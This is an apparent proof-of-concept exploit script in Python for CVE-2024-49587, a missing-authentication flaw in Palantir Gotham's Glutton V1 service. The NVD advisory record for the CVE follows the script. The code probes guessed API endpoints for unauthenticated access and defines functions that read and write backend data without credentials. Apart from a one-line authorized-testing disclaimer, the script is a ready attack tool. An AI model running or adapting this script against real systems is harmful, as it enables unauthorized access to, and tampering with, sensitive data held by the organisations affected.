CVE-2024-49587

# CVE-2024-49587 PoC - Unauthenticated Glutton V1 Access # Palantir Gotham Glutton Service Endpoint Discovery and Access import requests import json import sys TARGET_HOST = "https://gotham-example.palantir.com" GLUTTON_BASE_PATH = "/glutton/api/v1" def check_glutton_exposure(target): """Check if Glutton V1 endpoints are exposed without authentication""" endpoints = [ "/endpoints", "/data", "/config", "/health", "/status" ] print(f"[*] Scanning {target} for Glutton V1 exposure...") for endpoint in endpoints: url = f"{target}{GLUTTON_BASE_PATH}{endpoint}" try: response = requests.get(url, timeout=10, verify=False) print(f"\n[+] Endpoint: {endpoint}") print(f" Status: {response.status_code}") if response.status_code == 200: print(f" [!] VULNERABLE: Endpoint accessible without auth") print(f" Response: {response.text[:200]}") elif response.status_code == 401: print(f" [+] Protected: Authentication required") else: print(f" [-] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") def exploit_glutton_read(target): """Exploit: Read data from Glutton backend without authentication""" print(f"\n[*] Attempting data read via Glutton API...") url = f"{target}{GLUTTON_BASE_PATH}/data" headers = { "Content-Type": "application/json", "User-Agent": "Glutton-Client/1.0" } try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print("[!] Successfully retrieved data without authentication!") return response.json() except: pass return None def exploit_glutton_write(target, data_payload): """Exploit: Update data via Glutton backend without authentication""" print(f"\n[*] Attempting data update via Glutton API...") url = f"{target}{GLUTTON_BASE_PATH}/data" headers = { "Content-Type": "application/json" } try: response = requests.post(url, json=data_payload, headers=headers, timeout=10) if response.status_code in [200, 201, 204]: print("[!] Successfully updated data without authentication!") return True except: pass return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] check_glutton_exposure(TARGET_HOST) # Note: Only use for authorized penetration testing

{"cve": {"id": "CVE-2024-49587", "sourceIdentifier": "[email protected]", "published": "2025-12-19T17:15:50.643", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Glutton V1 service endpoints were exposed without any authentication on Gotham stacks, this could have allowed users that did not have any permission to hit glutton backend directly and read/update/delete data. The affected service has been patched and automatically deployed to all Apollo-managed Gotham Instances"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-305"}]}], "references": [{"url": "https://palantir.safebase.us/?tcuUid=95e2d805-dd2f-4544-b164-e61100f47b11", "source": "[email protected]"}]}}